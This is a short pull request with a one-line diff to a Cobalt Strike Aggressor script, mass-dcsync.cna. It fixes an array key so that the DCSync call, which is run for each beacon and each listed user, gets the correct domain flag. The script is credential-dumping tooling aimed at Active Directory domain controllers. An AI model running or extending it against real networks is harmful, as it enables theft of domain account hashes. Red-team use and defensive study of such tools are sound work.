### PR TITLE
Bugfix to mass-dcsync

### DIFF
--- a/mass-dcsync.cna
+++ b/mass-dcsync.cna
@@ -13,7 +13,7 @@ sub mass-dcsync {
 		closef($handle);
 		foreach $bid (@bids){
 			foreach $user (@userlistdata){
-				bdcsync($bid, $3['$fqdn'], $3['domain'] . $+ . '\\' . $+ . $user);
+				bdcsync($bid, $3['fqdn'], $3['domain'] . $+ . '\\' . $+ . $user);
 			};
 		};
 		}));


### PR DESCRIPTION
removal of the '$' in the array to ensure the /domain flag is actually set.